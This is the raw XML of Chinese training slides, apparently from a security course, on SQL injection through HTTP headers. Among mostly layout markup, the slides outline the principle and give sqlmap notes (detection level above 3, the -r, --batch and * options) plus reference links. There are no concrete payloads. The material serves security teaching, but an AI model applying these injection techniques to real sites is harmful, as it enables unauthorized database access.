            <a:xfrm>
              <a:off x="3696" y="1776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" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="192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" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696" y="206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7" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="206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8" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="206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sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="838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10" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="4256088"/>
            <a:ext cx="711270" cy="5334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11" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="304830" cy="2286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12" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888"/>
            <a:ext cx="406440" cy="3048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2540" y="2732088"/>
            <a:ext cx="8840070" cy="6858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59570" y="3494088"/>
            <a:ext cx="751914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pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者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865" y="1437005"/>
            <a:ext cx="3223895" cy="1263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8449" y="355600"/>
            <a:ext cx="8685538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0E65E-9137-4309-8D78-B392A1917D52}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117" descr="掌控者LOGO"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="8712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B4DC4-41B9-4E61-AD6F-4DDEA2B4591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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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27" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="1044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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="1776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38" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2065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39" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400" y="2207"/>
              <a:ext cx="95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0" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1776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1" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="1920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2" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2545" y="2065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3" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="1776"/>
              <a:ext cx="97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4" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2065"/>
              <a:ext cx="97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5" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2687" y="2207"/>
              <a:ext cx="97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6" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1776"/>
              <a:ext cx="98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7" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="1920"/>
              <a:ext cx="98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8" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2065"/>
              <a:ext cx="98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9" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832" y="2207"/>
              <a:ext cx="98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0" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="1920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1" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976" y="2207"/>
              <a:ext cx="97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2" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1776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3" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="1920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4" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120" y="2065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5" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="1776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6" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264" y="2065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7" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1632"/>
              <a:ext cx="95" cy="97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8" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1776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9" name="Rectangle 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="1920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0" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408" y="2065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1" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1632"/>
              <a:ext cx="95" cy="97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2" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3553" y="1920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3" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1776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4" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="1920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5" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3695" y="2065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6" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256" y="2065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7" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2112" y="2065"/>
              <a:ext cx="97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sp>
        <p:nvSpPr>
          <p:cNvPr id="1029" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="3810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30" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="1524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31" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800"/>
            <a:ext cx="406440" cy="3048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11270" y="1295400"/>
            <a:ext cx="109230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588550" y="6505575"/>
            <a:ext cx="111771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CFB4DC4-41B9-4E61-AD6F-4DDEA2B45915}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN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00864" y="262255"/>
            <a:ext cx="86855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129331" y="302423"/>
            <a:ext cx="8685086" cy="487338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等待开课</a:t>
            </a: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8645" y="2249805"/>
            <a:ext cx="4137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正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>今日课程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>：头注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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8935" y="3587209"/>
            <a:ext cx="82533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500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>等待其他同学入场（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>:00-8:05</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>）  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>:0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>准时开讲！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0">
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑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1637" y="5887815"/>
            <a:ext cx="4272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粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>微</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>信公众号：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>掌控安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>EDU</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000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SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如何跑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入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Sqlmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>有检测等级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[1-5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>级</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>当检测等级高于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>级的时候就会测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入。不过这种方法并不好用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://sqlmap.org/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https://github.com/sqlmapproject/sqlmap/wiki/Usage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https://www.cnblogs.com/hongfei/p/3872156.html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/>
              <a:t>因为你没有一定的权限，为什么网站要记录你的信息？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每一个访问的人都记录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>吗？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而且记录信息很多时候都是插入语句，需要你手动闭合，靠</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种工具是不行的。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>记住工具不是万能的，如果是要测试人员干什么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>]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https://www.cnblogs.com/hongfei/p/3872156.html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-r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>指定数据包跑   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>--batch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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>语句替换位置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标题 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298934" y="315595"/>
            <a:ext cx="8685538" cy="487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l"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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作业</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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8935" y="1480185"/>
            <a:ext cx="6743700" cy="2333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715" y="4371975"/>
            <a:ext cx="7972425" cy="16287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7970" y="1715135"/>
            <a:ext cx="5274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https://www.cnblogs.com/hongfei/p/3872156.html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https://bbs.zkaq.cn/t/4491.html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https://bbs.zkaq.cn/t/4427.html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https://t0data.gitbooks.io/burpsuite/content/chapter8.html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26110" y="535559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https://www.virscan.org/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" y="179"/>
            <a:ext cx="12256767" cy="685764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70020" y="3519805"/>
            <a:ext cx="771779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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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掌控安全 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill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训练营</a:t>
            </a:r>
            <a:endParaRPr sz="2600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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8685" y="5453380"/>
            <a:ext cx="26003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方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>讲师：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
                <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              </a:rPr>
              <a:t>MSS </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
              <a:ea typeface="方正正粗黑简体" panose="02000000000000000000" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="标题 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-339090" y="2755265"/>
            <a:ext cx="12333605" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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Head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注入</a:t>
            </a:r>
            <a:endParaRPr sz="4000" dirty="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129072" y="302260"/>
            <a:ext cx="8685538" cy="487363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等待开课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1435" y="-29845"/>
            <a:ext cx="12295505" cy="69176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128754" y="302260"/>
            <a:ext cx="8685538" cy="487363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0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本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="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8540" y="1377950"/>
            <a:ext cx="9813925" cy="3954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sz="3600" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>				</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HEAD注入</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="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2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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了解head注入原理，掌握head注入的方法学会使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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跑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill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注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill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一、HEAD注入原理和使用场景</a:t>
            </a:r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二、head注入演示</a:t>
            </a:r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三、sqlmap 演示</a:t>
            </a:r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HEAD注入原理-什么是head</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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6585" y="1035685"/>
            <a:ext cx="1057719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注入攻击的本质，是把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用户输入的数据当做代码执行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sz="2400"/>
              <a:t>那什么是Head注入？</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
